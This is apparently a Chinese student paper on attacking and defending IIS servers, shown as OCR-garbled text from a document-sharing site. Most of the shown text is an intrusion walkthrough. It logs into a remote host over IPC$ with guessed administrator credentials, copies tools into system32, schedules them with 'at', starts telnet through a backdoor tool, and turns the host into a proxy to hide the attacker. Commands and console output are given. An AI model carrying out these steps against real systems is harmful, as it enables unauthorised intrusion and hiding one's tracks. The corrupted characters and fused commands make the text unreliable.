网络攻防论文

《网络攻防论文》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、网络攻击与防御技术——IIS服务器攻防姓名：XXXX学号：201011010122老师：申浩如日期：2013629信息技术学院目录1.入侵IIS服务器的准备工作1L1黑客入侵IIS服务器的流程11・2制作代理跳板11.2.1利用已知用户名和密码建立连接21.2.2拷贝文件到远程主机2123取得远程主机的木地吋间21.2.4建立任务21.2.5查看任务21.2.6启动远程主机的telnet服务2127登录主机31.2.8设置代理31.2.9退出目标主机41.2.10使用代理42.攻防实例：Unicode漏洞攻防62」使用扫描软件查找Unicode漏洞62.1.1使用流光软件62.1.2利用Un

2、icode漏洞简单修改H标主页的攻击92.2.Unicode漏洞解决方案111.入侵ns服务器的准备工作进入11s服务器将其网页换掉是很多黑客初学者的n标，也是黑客技术学习中重要的一课。但是，-•般的网站服务器都有专业的网管人员在管理，而口也加装了各种软件或硕件的防火墙，因此相对于入侵一•般单纯的上网电脑肯定会难得多，在本节小我们将讲解入侵网站服务器的流程。另外网管人员不同于一般的菜鸟，所以我们在入侵时还需耍很好地保护口己，所以需要制作代理跳板，以便隐藏自c身份，否则弄得一个“出师未捷身先死”，那就太不值得了。1.1黑客入侵iis服务器的流程一般來说，没有多大恶意的黑&入侵网站最多是为了炫耀

3、口己，主要体现在更换别人的主页。根据入侵的难易程度和成功率的高低，建议大家在入侵时采用以下的流程，如图i・i所示。例如在黑客入侵流程中，通过端口139进入共享磁盘和默认共享漏洞(IPC$)入侵，虽然这两种方法听起来有些离谱，但是的的确确有这种没有太强安全意识、或者是太懒的管理员，将139的门户大开，而且还没有设置权限限制。对目标服务器进行瘫痪攻击利用ActiveX运行程序漏洞寄邮件格式化服务髀利用ActiveX修改注册表寄邮件进行破坏1.2制作代理跳板要使一台网络主机成为自C的代理服务器，首先必须通过英他方式(如流光弱口令扫描)得到这台机器的用八名和密码，然后利用已知的用八名和密码与远程主机

4、建立连接。然后为远程主机启动telnet服务，以便登录到远程主机进行操作，能够登录远程主机后，就可以在它上面安装和设置代理服务器了，下面的操作以连接IP地址为10.0.13.19这台远程主机为例。121利用已知用户名和密码建立连接在命令提示符下，执行命令，使用己有的用户名和密码建立与目标主机的连接，命令如下:netuse\10.0.13.19ipc$密码/user:用户名如图1-2所示。C:>netuseW10.0.13.19ipc$123789/user:administrator命令成功完成。c：>122拷贝文件到远程主机利川建立的连接，将事先准备好的存放在当前口录下的ntlm

5、.exe和sksockserver.exe复制到远程主机的system32目录里，命令为：copyntlm.exe\10.0.13.19admin$system32copysksockserveuexe\10.0.13.19admin$sys(cm32D：tuoIsiis>cupyntln.exeW10.0.13.19adnin$systen32己复制1个文件。ID：touIsiis>cupsi3k3uckserver.exeW10.0.13.19adiniii$3y3tci«32己复制1个文件。1D：tooIsiis>ntlm.exe程序可以在流光安装目录下

6、的tools目录里找，这是一个专门关闭远程主机NTLM验证的程序，另外，述需要在同一个目录里找到netsvc.exe程序，这是一个专门打开远程主机服务的后门程序，在稍后将用它打开远程主机的telnet服务，使用telnet登录远程主机时会要求进行NTLM验证，可能导致telnet连接不上，所以需要先运行这个专门的程序将Windows的NTLM验证程序关闭。1.2.3取得远程主机的本地时间输入：nettimeW10.0.13」9,这样我们就得到了远程主机的木地时间。1.2.4建立任务输入：at\10.0.13.1911:17ntlm.exe,使目标主机在两分钟后运行ntlm.exe程序。D：

7、toolsiis>atW10.0.13.1911：17ntlm.exe新力口了一项作业，其作业ID=6D：Stoolsiis1.2.5查看任务输入：at\10.0」3」9命令，可以查看任务是否在列表中，如果没有了，说明任务已经执行。1.2.6启动远程主机的telnet服务输入：netsvctelnetW10.0.13.19/start,如图7-1-5所示，其中10.0.13.19是远程主机的IP地址。